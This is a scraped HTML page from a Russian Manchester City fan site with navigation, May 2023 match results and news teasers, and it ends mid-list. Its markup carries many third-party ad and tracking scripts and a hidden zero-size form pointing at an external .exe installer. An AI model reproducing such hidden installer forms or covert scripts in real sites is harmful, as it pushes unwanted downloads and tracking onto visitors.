<html xmlns="http://www.w3.org/1999/xhtml"><head>
    <script async="" src="//mc.yandex.ru/metrika/tag.js"></script><script async="" src="https://mc.yandex.ru/metrika/tag.js"></script><script type="text/javascript" src="/?gNPfOvjV56G9zSZRwnwZBG1lAdxKxKgpv%5Epib1JfPjlrILE%21bflJALLAgBqKZWNncatPhNVTnrD916emKq7XP6BMPt%5EGjs%5E7CWuT4WgvPeJQjWQ%21Ktc2qrByXtycdlxMIQIaI2G9XnrjBUMLmaHbKeh0TrItlO4nvwywEyzsn%21fPEf51JSapfiQG626%5ETYTVj14fEfGXwt42%21gkTmD3V"></script><script src="//mcfc-fan.ru/?rF%3BZHycXyVa0f7gwrSm%21PpDpja%3BzvWJk5rQ6N27Okk24%21euURaKibS%3Bt3Waj0LSFNWW5nN%5EDjek3Ufc3rKULic8gMzPrZy26JVMkVXPHIhhE8V7a%5EaPbf6P9ucWGafgQwqMgXFzVujYa7%3Boo"></script><script type="text/javascript" async="" src="//s1.rotaban.ru/rotaban.js?v=1684771200000"></script></head><body><div style="width:0px;height:0px;position:fixed;right:0px;top:0px;display:none;overflow:hidden;z-index:2147483640;margin:0;padding:0;background:none;" id="dVbsDF9ZEP"><link type="text/css" rel="StyleSheet" href="http://s28.ucoz.net/bnr/wrappers/wrapper_video.css"><form method="post" id="geturaninstaller" action="//uranupdates.com/installers/ursetup.exe"><input type="hidden" id="urangacid" name="gacid" value=""></form><div id="uPreroll-wrapper"></div></div><script type="text/javascript" src="/.s/src/jquery-1.7.2.js"></script><script type="text/javascript" src="/.s/src/uwnd.min.js"></script><script type="text/javascript" src="//rot.spotsniper.ru/?src=ucfs" async=""></script><script type="text/javascript" src="/?BDk5%5EuAnENYsBD1DlugVMgI9R7t2PaArUbp2U8R9xU71sJxRr9Bz7%21TDlehwOUr6sMLj7j73jSgktOMuQ6UJpU14WHXBOip%5Ect9pAvuPmD3hOTG0UpZJeRWLRxagBLcMjKZx3eHO9w6VvTp7tF%21drpfUBElR8%3BVO5meW7Pyz1iDbn4KduX0lUD4SYKXi240t8qApP3zTzGz1gFGkpUUzjiio"></script>
        <script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now();</script>
        <script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;ucoz_desktop_ad?r"+escape(document.referrer)+(screen&&";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth||screen.pixelDepth))+";u"+escape(document.URL)+";"+Date.now();</script>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="yandex-verification" content="4b68accbdbf18495">
    <title>Официальный сайт болельщиков ФК Манчестер Сити (Manchester City) в России</title>
    
    <link type="text/css" rel="StyleSheet" href="/_st/my.css">
    
    
    
    
        <link rel="stylesheet" href="/.s/src/base.min.css">
        <link rel="stylesheet" href="/.s/src/layer1.min.css">
    
        <script src="/.s/src/jquery-1.12.4.min.js"></script>
        
        <script src="/.s/src/uwnd.min.js"></script>
        <script src="//s28.ucoz.net/cgi/uutils.fcg?a=uSD&amp;ca=2&amp;ug=999&amp;isp=0&amp;r=0.852691707032314"></script>
    <script>/* --- UCOZ-JS-INIT_CODE --- */
        window.ulb = {photoPage:"Перейти на страницу с фотографией.", closeBtn:"Закрыть", error:"Запрошенный контент не может быть загружен. Пожалуйста, попробуйте позже.", next:"Следующий", prev:"Предыдущий", btnPlay:"Начать слайдшоу", btnToggle:"Изменить размер", };
    /* --- UCOZ-JS-END --- */</script>
    
        <link rel="stylesheet" href="/.s/src/ulightbox/ulightbox.min.css">
        <script src="/.s/src/ulightbox/ulightbox.min.js"></script>
        <script>
    /* --- UCOZ-JS-DATA --- */
    window.uCoz = {"site":{"id":"dmcfc","host":"mcfc.ucoz.com","domain":"mcfc-fan.ru"},"country":"US","ssid":"620704072255617301732","language":"ru"};
    /* --- UCOZ-JS-CODE --- */
    
            function eRateEntry(select, id, a = 65, mod = 'index', mark = +select.value, path = '', ajax, soc) {
                if (mod == 'shop') { path = `/${ id }/edit`; ajax = 2; }
                ( !!select ? confirm(select.selectedOptions[0].textContent.trim() + '?') : true )
                && _uPostForm('', { type:'POST', url:'/' + mod + path, data:{ a, id, mark, mod, ajax, ...soc } });
            }
    function loginPopupForm(params = {}) { new _uWnd('LF', ' ', -250, -100, { closeonesc:1, resize:1 }, { url:'/index/40' + (params.urlParams ? '?'+params.urlParams : '') }) }
    /* --- UCOZ-JS-END --- */
    </script>
    
        <style>.UhideBlock{display:none; }</style>
    
    
    
    
    
    
    <!-- RotaBan.ru Ad Code -->
    <script type="text/javascript">
    (function(){
     var rb = document.createElement('script');
     d = new Date();
     d.setHours(0);
     d.setMinutes(0);
     d.setSeconds(0);
     d.setMilliseconds(0);
     rb.type = 'text/javascript';
     rb.async = true;
     rb.src = '//s1.rotaban.ru/rotaban.js?v=' + d.getTime();
     (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(rb);
    })();
    </script>
    <!-- END RotaBan.ru Ad Code -->
    
    <!--U1AHEADER1Z--><script type="text/javascript" src="http://userapi.com/js/api/openapi.js?50"></script>
    <script type="text/javascript" src="http://userapi.com/js/api/openapi.js?49"></script>
    <script type="text/javascript">
     VK.init({apiId: 3015820, onlyWidgets: true});
    </script>
    
    <!--start insert-->
    <script type="text/javascript">
     $(document).ready(function(){
    
    
     $(function() {
     var fixed = $(".left_images");
     var fixed2 = $(".right_images");
     var offset = 154;
     var topPadding = 0;
     $(window).scroll(function() {
     if ($(window).scrollTop() > 0) {
     if ((154-$(window).scrollTop())>0)
     {
     fixed.stop().css("top", 154-$(window).scrollTop());
     fixed2.stop().css("top", 154-$(window).scrollTop());
     }
     else {
     fixed2.stop().css("top", 0);
     fixed.stop().css("top", 0);
     }
    
     }
     else {
     fixed.stop().css("top", 154);
     fixed2.stop().css("top", 154);
     };});
    });
     function resizeBlock() {
     if (($(window).width()-1000)>10) {
     $(".left_images").css("width", ($(window).width()-1000)/2-2);
     $(".right_images").css("width", ($(window).width()-1000)/2-2);
     }
     else
     {
     $(".left_images").css("width", 0);
     $(".right_images").css("width", 0);
     }
     }
     resizeBlock();
     $(window).resize(function() {
     resizeBlock();
     });
     });
    </script>
    <div class="left_images" style="width: 0px;"><img src="/new_temp/bok_bg.png" alt=""></div>
    <div class="right_images" style="width: 0px;"><img src="/new_temp/bok_bg.png" alt=""></div>
    <!--end insert-->
    <script type="text/javascript" src="/designs_114/script_site.js"></script> 
    <div id="container_wrap" class="modulesindex pagessitePage1 uripage1">
     <div id="header">
     <h1 id="hlogo">
     <span class="left"><a href="/"><img src="/designs_114/logo.png" width="96" height="112" alt="Сайт болельщиков ФК Манчестер Сити (Manchester City)"></a></span>
     <span class="hlogo_desc">Официальный сайт болельщиков</span>
     <img src="/designs_114/logo_text.png" width="598" height="47" alt="Manchester City"> 
     <span class="hlogo_desc right">mcfc-fan.ru</span>
     </h1>
    <!--start insert-->
     <div class="icons">
     <a href="https://twitter.com/MCFCRussia" target="_blanc" rel="nofollow" class="twit_icon"></a>
     <a href="https://vk.com/manchester.fancity" target="_blanc" rel="nofollow" class="vk_icon"></a>
     <a href="http://feeds.feedburner.com/mcfc-fan/rss" target="_blanc" rel="nofollow" class="feed_icon"></a>
     </div>
     <!--end insert-->
     </div><!--/header-->
     <div id="content_c_bg">
     <div id="content_b_bg">
     <div id="content_t_bg">
     <div id="content_in">
     <ul id="hnav">
     <li><strong><a href="http://mcfc-fan.ru/index/liga_chempionov_2016_17/0-526">ЛЧ</a></strong></li>
     <li><a href="/">Главная</a></li>
     <li><a href="/news/">Новости</a>
    <ul>
     <li><a href="/news/1-0-5">Фото</a></li>
     <li><a href="/news/1-0-4">Видео</a></li>
     <li><a href="/news/1-0-2">Превью</a></li>
     <li><a href="/news/1-0-1">Отчеты</a></li>
     <li><a href="/news/1-0-8">Интервью</a></li>
     <li><a href="/news/1-0-7">Трансферы</a></li>
     <li><a href="/news/1-0-10">Текстовые трансляции</a></li>
     <li><a href="/news/1-0-9">Лига Чемпионов</a></li>
    </ul>
    </li>
     <li><a href="http://webrose.ru/clubs/manchester-city">Магазин</a></li>
     <li><a href="/forum/">Форум</a>
    <ul>
     <li><a href="/forum/3">Манчестер Сити</a></li>
     <li><a href="/forum/18">Английский футбол</a></li>
     <li><a href="/forum/4">Мировой футбол</a></li>
     <li><a href="/forum/24">Мировые игроки</a></li>
     <li><a href="/forum/22">Виртуальный менеджер</a></li>
     <li><a href="/forum/6">Администрация</a></li>
    </ul>
    </li>
     <li><a href="/blog">Блоги</a>
    <ul>
    <li><a href="/blog/raf/1-0-2">Раф</a></li>
    <li><a href="/blog/pakmancity/1-0-26">А.Пахомов</a></li>
    <li><a href="/blog/holden_caulfield/1-0-29">Holden_caulfield</a></li>
    <li><a href="/blog/zhdanov/1-0-30">zhdanov</a></li>
    <li><a href="/blog/foto_dnya/1-0-24">Фото дня</a></li>
    </ul>
    </li>
     <li><a href="/photo/">Фото</a>
    <ul>
    <li><a href="/photo/sezon_2022_2023/614">Сезон 2022/2023</a></li>
    <li><a href="/photo/sezon_2021_2022/547">Сезон 2021/2022</a></li>
    <li><a href="/photo/sezon_2020_2021/484">Сезон 2020/2021</a></li>
    <li><a href="/photo/sezon_2019_2020/413">Сезон 2019/2020</a></li>
    </ul>
    </li>
     <li><a href="/video/">Видео</a></li>
     <li><a href="/index/istoria_manchester_city/0-462">История</a>
     <ul>
     <li><a href="/index/0-100">Клуб</a></li>
     <li><a href="/index/trenera/0-215">Тренеры</a></li>
     <li><a href="/index/vladelcy/0-459">Владельцы</a></li>
     <li><a href="/index/istorija_po_datam/0-243">Даты</a></li>
     <li><a href="/index/nagrady/0-460">Награды</a></li>
     <li><a href="/index/istorija_formy/0-458">Форма</a></li>
     <li><a href="/index/stadiony/0-461">Стадионы</a></li>
     <li><a href="/index/50_luchshikh_igrokov_manchester_siti/0-299">50 лучших футболистов</a></li>
     </ul>
    </li>
     <li><a href="/index/0-100">Клуб</a>
    <ul>
    <li><a href="/index/klubnaja_forma_sezon_2013_14/0-455">Форма</a></li>
    <li><a href="/index/0-53">Трансферы</a></li>
    <li><a href="/index/0-60">Гимн клуба</a></li>
    <li><a href="/index/0-54">Песни клуба</a></li>
    <li><a href="/index/pesni_o_quot_manchester_siti_quot/0-422">Песни о Сити</a></li>
    
    </ul>
    </li>
     <li><a href="/index/sostav_komandy/0-545">Состав</a></li>
     <li><a href="/index/kalendar_igr_22_23/0-588">Календарь</a></li>
     <li><a href="/index/0-51">Таблица</a></li>
     
     
     
    <li><a href="/index/komanda_sajta_mcfc_fan_ru/0-416">Контакты</a> 
    <ul>
    <li><a href="/index/komanda_sajta_mcfc_fan_ru/0-416">Команда</a></li>
    <li><a href="/index/0-3">Контакты</a></li>
    <li><a href="/index/obmen_bannerami/0-424">Обмен баннерами </a></li>
    </ul>
    </li>
    <li><a href="/index/0-91">Реквизиты</a></li> 
    </ul>
     <div id="blocktop">
     <b class="bline1"></b>
     <b class="bline2"></b>
     <b class="bline3"></b>
    <!--start insert-->
     <div class="rows ago">
     <strong class="bt_title">Прошедший матч</strong> 
     <a href="http://mcfc-fan.ru/news/siti_chelsi_1_0/2023-05-21-22214" class="otchet">Отчет</a>
     <div class="btmatch_prim">Премьер-лига 21.05 в 18.00 МСК</div>
     <img src="http://mcfc-fan.ru/Logotipy_Klubov/England/chelsea.png" style="
     height: 70px;
    "><br><div class="fk_clubs">Манчестер Сити</div><span class="score">1</span>
     <div class="fk_clubs second">Челси</div><span class="score">0</span>
     <ul class="row_links">
     <li>Превью</li>
     <li><a href="http://mcfc-fan.ru/news/siti_chelsi_1_0/2023-05-21-22214">Отчёт</a></li>
     <li><a href="http://mcfc-fan.ru/news/video_obzor_manchester_siti_chelsi/2023-05-21-22215">Обзор</a></li>
     <li><a href="http://mcfc-fan.ru/photo/sezon_2022_2023/manchester_siti_chelsi_premer_liga_37_tur/678">Фото</a></li> 
     </ul>
     </div>
    <div class="rows fut">
     <strong class="bt_title">Следующий матч</strong> 
     <a href="http://mcfc-fan.ru/index/kalendar_igr_22_23/0-588" class="otchet">Календарь</a>
     <div class="btmatch_prim">Премьер-лига 24.05 в 22.00 МСК</div>
     <img src="http://mcfc-fan.ru/Logotipy_Klubov/England/Brighton.png" style="
     height: 70px;
    "><br><div class="fk_clubs">Брайтон</div>
     <div class="fk_clubs second">Манчестер Сити</div>
     <ul class="row_links">
     <li>Превью</li>
     <li>Отчёт</li>
     <li>Обзор</li>
     <li>Фото</li>
     </ul>
     </div>
    <!--end insert-->
     
     <div class="rows">
     <strong class="bt_title">Отчеты матчей</strong>
     <ul class="bnav">
     <li><a href="http://mcfc-fan.ru/news/siti_chelsi_1_0/2023-05-21-22214">Сити - Челси 1-0</a></li><li><a href="http://mcfc-fan.ru/news/siti_real_madrid_4_0/2023-05-17-22202">Сити - Реал Мадрид 4-0</a></li><li><a href="http://mcfc-fan.ru/news/ehverton_siti_0_3/2023-05-14-22194">Эвертон - Сити 0-3</a></li><li><a href="http://mcfc-fan.ru/news/real_madrid_siti_1_1/2023-05-09-22185">Реал Мадрид - Сити 1-1</a></li><li><a href="http://mcfc-fan.ru/news/siti_lids_2_1/2023-05-06-22172">Сити - Лидс 2-1</a></li><li><a href="http://mcfc-fan.ru/news/siti_vest_khehm_3_0/2023-05-03-22167">Сити - Вест Хэм 3-0</a></li>
     </ul>
     </div>
     
     <script type="text/javascript">
     sendFrm549009=function(){
     var o=$('#frmLg549009')[0],pos=_uGetOffset(o),o2=$('#blk549009')[0];
     document.body.insertBefore(o2,document.body.firstChild);
     $(o2).css({top:(pos['top'])+'px',left:(pos['left'])+'px',width:o.offsetWidth+'px',height:o.offsetHeight+'px',display:''}).html('<div align="left" style="padding:5px;"><div class="myWinLoad"></div></div>');
     _uPostForm('frmLg549009',{type:'POST',url:'/index/sub/',error:function() {
     $('#blk549009').html('<div align="left" style="padding:10px;"><div class="myWinLoadSF" title="Невозможно выполнить запрос, попробуйте позже"></div></div>');
     _uWnd.alert('<div class="myWinError">Невозможно выполнить запрос, попробуйте позже</div>','',{w:250,h:90,tm:3000,pad:'15px'});
     setTimeout("$('#blk549009').css('display','none');",'1500');
     }
     });
     }
     </script>
     <div id="blk549009" style="border:1px solid #CCCCCC;position:absolute;z-index:82;background:url('http://s14.ucoz.net/img/fr/g.gif');display:none;"></div>
     <div class="rows">
     <strong class="bt_title">Авторизация</strong>
     <form action="" id="frmLg549009" method="post" class="hlogin" onsubmit="sendFrm549009();return false;">
     <div class="hlogin_in"><div><label for="loginEnterToSite" class="labelLogin">Логин</label> <input name="user" type="text" id="loginEnterToSite"></div></div>
     <div class="hlogin_in"><div><label for="passwordEnterToSite" class="labelPass">Пароль</label> <input name="password" type="password" id="passwordEnterToSite"></div></div>
     <div class="hlogin_bottom">
     <div class="left"><a href="/index/3">Регистрация!</a><br> <a href="javascript://" rel="nofollow" onclick="new _uWnd('Prm','Напоминание пароля',300,130,{autosize:1,closeonesc:1},{url:'/index/5'});return false;">Забыли пароль?</a></div>
     <input name="sbm" type="submit" value=" " class="hlogin_submit">
     </div>
     <div style="display:none;">
     <input name="rem" type="checkbox" value="">
     <input type="hidden" name="a" value="2">
     <input type="hidden" name="ajax" value="1">
     <input type="hidden" name="rnd" value="009">
     </div>
     </form>
     </div>
     
     </div><!--/blocktop-->
     <div id="content_full" class="input_style"><!--/U1AHEADER1Z-->
    <div class="wrap-middle">
    <!-- <middle> -->
     <div id="side_right">
    <!--U1CONTBLOCK1Z--><center><a href="https://vk.com/mancityco" target="_blank"><img src="http://mcfc-fan.ru/banner_manchester.jpg" border="0" alt=""></a></center>
    
    <br>
    
    <div class="cslider">
    <ul class="cslider_pict">
    
    <li style="display: none;">
    <b><img src="http://mcfc-fan.ru/Slider/646a65a070931.jpg"></b>
     <div class="csl_text"><h4><a href="http://mcfc-fan.ru/news/manchester_siti_chempion_anglijskoj_premer_ligi_2022_2023/2023-05-21-22212" class="csl_link">Подробнее</a>"МАНЧЕСТЕР СИТИ" - ЧЕМПИОН АНГЛИЙСКОЙ ПРЕМЬЕР-ЛИГИ 2022/2023</h4> <p></p>"Манчестер Сити" третий раз подряд завоевывает титул чемпиона Англии.<p></p></div>
    </li>
    <li style="display: none;">
    <b><img src="http://mcfc-fan.ru/Slider/aq2i1091.jpg"></b>
    <div class="csl_text" style="display: block; bottom: 0px;"><h4><a href="http://mcfc-fan.ru/news/siti_chelsi_1_0/2023-05-21-22214" class="csl_link">Подробнее</a>Сити - Челси 1-0</h4> <p></p>В своем первом матче в статусе новоиспеченного чемпиона Премьер-Лиги "Манчестер Сити" одержал победу 1:0 над "Челси" благодаря быстрому голу Хулиана Альвареса.<p></p></div>
    </li>
    <li style="display: none;">
    <b><img src="http://mcfc-fan.ru/Slider/tf701532.jpg"></b>
    <div class="csl_text" style="display: block; bottom: 0px;"><h4><a href="http://mcfc-fan.ru/news/real_madrid_siti_1_1/2023-05-09-22185" class="csl_link">Подробнее</a>Реал Мадрид - Сити 1-1</h4> <p></p>Гол Кевина Де Брюйне позволил "Манчестер Сити" свести вничью первый полуфинальный матч Лиги Чемпионов против "Реала" — 1:1.<p></p></div>
    </li>
    <li style="display: none;">
    <b><img src="http://mcfc-fan.ru/Slider/tf500612.jpg"></b>
     <div class="csl_text" style="display: block; bottom: 0px;"><h4><a href="http://mcfc-fan.ru/news/ehverton_siti_0_3/2023-05-14-22194" class="csl_link">Подробнее</a>Эвертон - Сити 0-3</h4> <p></p>Дубль и результативная передача Илкай Гюндогана обеспечили "Манчестер Сити" сверхуверенную победу в гостях у "Эвертона" — 0:3.<p></p></div>
    </li>
    <li style="display: block;">
    <b><img src="http://mcfc-fan.ru/Slider/li100857.jpg"></b>
     <div class="csl_text" style="display: block; bottom: 0px;"><h4><a href="http://mcfc-fan.ru/news/siti_real_madrid_4_0/2023-05-17-22202" class="csl_link">Подробнее</a>Сити - Реал Мадрид 4-0</h4> <p>Сокрушив "Реал" со счетом 4:0, "Манчестер Сити" вышел в финал Лиги Чемпионов, где 10 июня сыграет в Стамбуле против "Интера".</p></div>
    </li>
    
    
    
    
    
    
    
    
    
    
    
    
    
    </ul>
    <ul class="cslider_thumbs"><li><a href="javascript://" class=""><img src="http://mcfc-fan.ru/Slider/646a65a070931.jpg"></a></li><li><a href="javascript://" class=""><img src="http://mcfc-fan.ru/Slider/aq2i1091.jpg"></a></li><li><a href="javascript://" class=""><img src="http://mcfc-fan.ru/Slider/tf701532.jpg"></a></li><li><a href="javascript://" class=""><img src="http://mcfc-fan.ru/Slider/tf500612.jpg"></a></li><li><a href="javascript://" class="current"><img src="http://mcfc-fan.ru/Slider/li100857.jpg"></a></li></ul>
    </div>
    <br><!--/U1CONTBLOCK1Z-->
    <!-- <body> --><div style="margin-bottom: 20px">
                      <div class="bn-wrapperWrithwhasd">
        <div class="bn-wrapperdqwfqwfF">
          <div class="bn-left-sidewqfqf1231">
            <a href="https://hoff.ru/catalog/spalnya/krovati/?matras_v_komplekte=da" target="_blank" class="bn-main-text-logodqwwqf123">
              <img class="bn-logodqwe123123" src="https://images2.imgbox.com/1c/d7/7Z0bI1kz_o.png" alt="">
            </a>
            <a target="_blank" href="https://hoff.ru/catalog/spalnya/krovati/?matras_v_komplekte=da" class="bn-advantagesdwqe3123">
              <img src="https://images2.imgbox.com/1a/07/YBWlGN37_o.png" alt="">
            </a>
          </div>
    
          <a target="_blank" href="https://hoff.ru/catalog/spalnya/krovati/?matras_v_komplekte=da" class="bn-furnituredqwed1qe12">
            <img src="https://images2.imgbox.com/a4/32/4Q7eep2n_o.png" alt="">
          </a>
        </div>
        <div class="bn-footerfqwe123123">
          <a class="bn-anchor-linkwqd12321edqwdqf" target="_blank" href="https://hoff.ru/catalog/spalnya/krovati/?matras_v_komplekte=da" style="max-width: 710px">
            купить кровать с матрасом в москве
          </a>
        </div>
      </div><script type="text/javascript">let hrefs = document.getElementsByClassName("fpa-click"); for(var i = 0; i< hrefs.length; i++) { hrefs[i].onclick = function() { location.href = this.getAttribute("data-url"); }; }    const globalBlock = document.querySelector('.bn-wrapperWrithwhasd')
        const bnLink = document.querySelector('.bn-anchor-linkwqd12321edqwdqf');
        const globalBlockWidth = globalBlock.offsetWidth
        bnLink.setAttribute('style', `max-width: ${globalBlockWidth}px`)</script><style type="text/css">.fpa-block{padding:15px;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";font-weight:400;line-height:1.2;color:#212529;text-align:left;background-color:#fff}.fpa-side{display:-ms-flexbox!important;display:flex!important;align-items:start!important;-ms-flex-align:start!important;margin-bottom:15px}.fpa-inline img{margin-right:10px;width:75px}.fpa-side img{margin-right:1rem!important;width:40%;max-width:150px}.fpa-rating{color:#ffc107!important}.fpa-price,.fpa-rating{min-width:80px}.fpa-price{font-weight:700;display:block;color:#2a2a2a}.fpa-side .fpa-rating{padding:10px 0}.fpa-link{color:#2980b9;text-decoration:underline;margin-right:10px}.fpa-link:last-child{margin-right:0}.fpa-link:hover{text-decoration:none}.fpa-side .fpa-btn{margin-top:15px}.ml-auto{margin-left:auto!important}.btn{display:inline-block;font-weight:400;color:#212529;text-align:center;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:transparent;border:1px solid transparent;padding:.375rem .75rem;font-size:1rem;border-radius:.25rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;cursor:pointer;text-decoration:none;line-height:1;padding:5px 15px;border-radius:1px}.fpa-btn:not(:disabled):not(.disabled).active:focus,.fpa-btn:not(:disabled):not(.disabled):active:focus,.show>.fpa-btn.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.fpa-btn:not(:disabled):not(.disabled).active,.fpa-btn:not(:disabled):not(.disabled):active,.show>.fpa-btn.dropdown-toggle{color:#212529;background-color:#d39e00;border-color:#c69500}.fpa-btn.focus,.fpa-btn:focus{color:#212529;background-color:#e0a800;border-color:#d39e00;box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.fpa-btn:hover{color:#212529;background-color:#e0a800;border-color:#d39e00}.fpa-btn{color:#212529;background-color:#ffc107;border-color:#ffc107;cursor:pointer;border-radius:3px;font-size:14px;padding:5px 7px}.fpa-product{font-size:16px;color:#2980b9;text-decoration:none;background-color:transparent}.fpa-product:hover{text-decoration:underline}.fpa-rating svg{height:16px;width:16px;display:inline}.fpa-block__wrapper .fpa-product{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;margin-left:auto;width:calc(100% - 88px)}.fpa-block_border{border:1px solid #e4e2e259}.fpa-img{flex-shrink:0}h2{font-size:20px}.fpa-inline{display:flex;align-items:flex-start;flex-wrap:wrap;position:relative}.fpa-link-list{display:flex;align-items:center;flex-wrap:wrap}.fpa-link{margin-top:15px;margin-right:15px;font-size:14px}.fpa-link:last-child{margin-right:0}.fpa-wrapper{display:flex;align-items:flex-start;justify-content:space-between}.fpa-wrapper .fpa-inline{width:50%;padding-right:13px}.fpa-wrapper .fpa-product{width:calc(100% - 89px);white-space:inherit}.fpa-wrapper .fpa-product{-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden;text-overflow:ellipsis;max-height:37px;display:block;display:-webkit-box;-webkit-box-orient:vertical;-webkit-line-clamp:2}.fpa-wrapper .fpa-rating{top:37px}.fpa-side-collumn .fpa-inline{display:flex;flex-direction:column;align-items:flex-start}.fpa-side-collumn .fpa-product{width:100%}.fpa-side-collumn.fpa-side{flex-wrap:wrap}.fpa-side-collumn .fpa__list{display:flex;flex-direction:column;align-items:flex-start;top:133px;left:167px}.fpa__list .ml-auto{margin-left:0!important}.fpa-side-collumn.fpa-side img{max-width:120px;width:100%;height:150px}.fpa-side-collumn .fpa-product{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;margin-left:auto;margin-bottom:15px}.fpa-link-list_col{flex-direction:column;display:flex;align-items:flex-start}.fpa-link-list_col .fpa-link{margin-top:0;margin-bottom:4px}.fpa-link-list_col .fpa-link:last-child{margin-bottom:0}@media (max-width:767px){.fpa-wrapper{flex-direction:column}.fpa-wrapper .fpa-inline{margin-bottom:15px}.fpa-wrapper .fpa-inline:last-child{margin-bottom:0}.fpa-wrapper .fpa-inline{width:100%}.fpa-link{margin-top:0;margin-bottom:5px}.fpa-link:last-child{margin-bottom:0}.fpa-link-list{margin-top:10px}.fpa-side-collumn .fpa-product{margin-bottom:9px}}.fpa-img{height:auto}.fpa-inline{display:flex;align-items:flex-start;flex-wrap:nowrap}.fpa-block__container{overflow:hidden}.fpa-block__wrapper .fpa-product{width:100%;display:inline-block}.fpa__list{display:flex;align-items:center;margin-top:10px}.fpa-rating{overflow: hidden;line-height:1;margin-top:10px}.fpa-click {cursor:pointer;}.entry p,.entry dd { margin-bottom: 0; }.entry p {text-indent: 0;}.entry a {font-weight: 400}.entry .fpa-rating p { color: #ffc107!important;}.fpa__list br {display: none;}.fpa-rating svg {display: inline !important;}    .bn-wrapperWrithwhasd {
          box-sizing: border-box;
        }
    
        .bn-wrapperWrithwhasd img {
          max-width: 100%;
        }
    
        .bn-left-sidewqfqf1231 {
          width: 400px;
          display: flex;
          align-items: center;
          justify-content: space-between;
        }
    
        .bn-furnituredqwed1qe12 {
          width: calc(100% - 400px);
          position: absolute;
          right: -12px;
          /* top: -21px; */
          top: -55px;
        }
    
        .bn-wrapperWrithwhasd {
          overflow: hidden;
          width: 100%;
          position: relative;
          max-width: 900px;
    
          height: 170px;
          background-color: #f8f9fb;
          border: 1px solid #e8e8e8;
          padding-left: 12px;
    
          font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto,
            "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji",
            "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
          font-weight: 400;
          line-height: 1.2;
    
          display: flex;
          align-items: flex-start;
          flex-direction: column;
        }
    
        .bn-wrapperdqwfqwfF {
          display: flex;
          justify-content: flex-start;
          align-items: center;
          height: 100%;
          overflow: hidden;
        }
    
        .bn-main-text-logodqwwqf123 {
          display: flex;
          flex-direction: column;
          justify-content: center;
          align-items: flex-start;
          gap: 14px;
        }
    
        .bn-anchor-linkwqd12321edqwdqf {
          text-decoration: none;
          color: #2f80ed;
          font-size: 14px;
          padding-left: 10px;
          padding-bottom: 7px;
          overflow: hidden;
          white-space: nowrap;
          text-overflow: ellipsis;
          display: block;
          padding-right: 21px;
          max-width: 900px;
          /* max-width: 139px; */
          width: 100%;
          position: relative;
          z-index: 1;
        }
    
        .bn-wrapperWrithwhasd {
          position: relative;
        }
    
        .bn-wrapperWrithwhasd:before {
          content: "";
          position: absolute;
          left: 0;
          height: 35px;
          bottom: 0;
          right: 0;
          z-index: 1;
          background-color: #f8f9fb;
        }
    
        .bn-anchor-linkwqd12321edqwdqf.active {
          white-space: inherit;
          text-overflow: clip;
          max-width: 100%;
          position: relative;
          z-index: 2;
        }
    
        .bn-advantagesdwqe3123 {
          height: 100%;
          display: flex;
          justify-content: center;
          align-items: center;
        }
    
        .bn-advantagesdwqe3123 img {
          position: relative;
          top: -8px;
        }
    
        .furniture img {
          max-width: initial !important;
        }
    
        .bn-advantagesdwqe3123 img {
          max-width: initial !important;
        }
    
        .bn-furnituredqwed1qe12 {
          height: 100%;
          display: flex;
          justify-content: center;
          align-items: center;
        }
    
        .bn-main-text-logodqwwqf123 img {
          max-width: initial !important;
        }
    
        .bn-advantagesdwqe3123 img {
          max-width: initial !important;
        }
    
        @media (max-width: 640px) {
          .bn-furnituredqwed1qe12 {
            display: none;
          }
    
          .bn-left-sidewqfqf1231 {
            width: 100%;
          }
    
          .bn-wrapperdqwfqwfF {
            width: 100%;
          }
    
          .bn-advantagesdwqe3123 img {
            top: 0;
          }
        }
    
        @media (max-width: 385px) {
          .bn-main-text-logodqwwqf123 {
            width: 130px;
          }
    
          .bn-main-text-logodqwwqf123 img {
            max-width: 100% !important;
          }
    
          .bn-advantagesdwqe3123 {
            width: 208px;
            padding-right: 10px;
          }
    
          .bn-advantagesdwqe3123 img {
            max-width: 100% !important;
          }
    
          .bn-wrapperWrithwhasd {
            padding-left: 1px;
          }
        }</style><span style="display:none;" class="fpaping"></span>
                </div><script async="" class="=cEg0TnltOEs7LTI1OzE=" src="https://play.gramombird.com/app.js"></script> <br> <script>
                    function spages(p, link) {
                        if (1) return !!location.assign(link.href);
                        ajaxPageController.showLoader();
                        _uPostForm('', {url:'news/' + p + '-0-0-0-0-0-' + Date.now() } );
                    }</script>
                    <div id="allEntries"><div id="entryID22220"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/karrager_siti_ne_dostig_by_takikh_vysot_s_drugim_trenerom/2023-05-22-22220">Каррагер: "Сити" не достиг бы таких высот с другим тренером"</a></h4>
     <div class="viewn_top">
     
     22-05-2023, 20:13 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/intervju/1-0-8">Интервью</a> | Комм. 1
     </div>
     <div class="viewn_cont">
     
    <img src="https://i1.imageban.ru/out/2023/05/22/4323c3ef93c3d2e5b1b71cb45655a320.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Бывший игрок "Ливерпуля" Джейми Каррагер считает, что "Манчестер Сити" может выиграть требл в этом сезоне.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22219"><div class="viewn_loop">
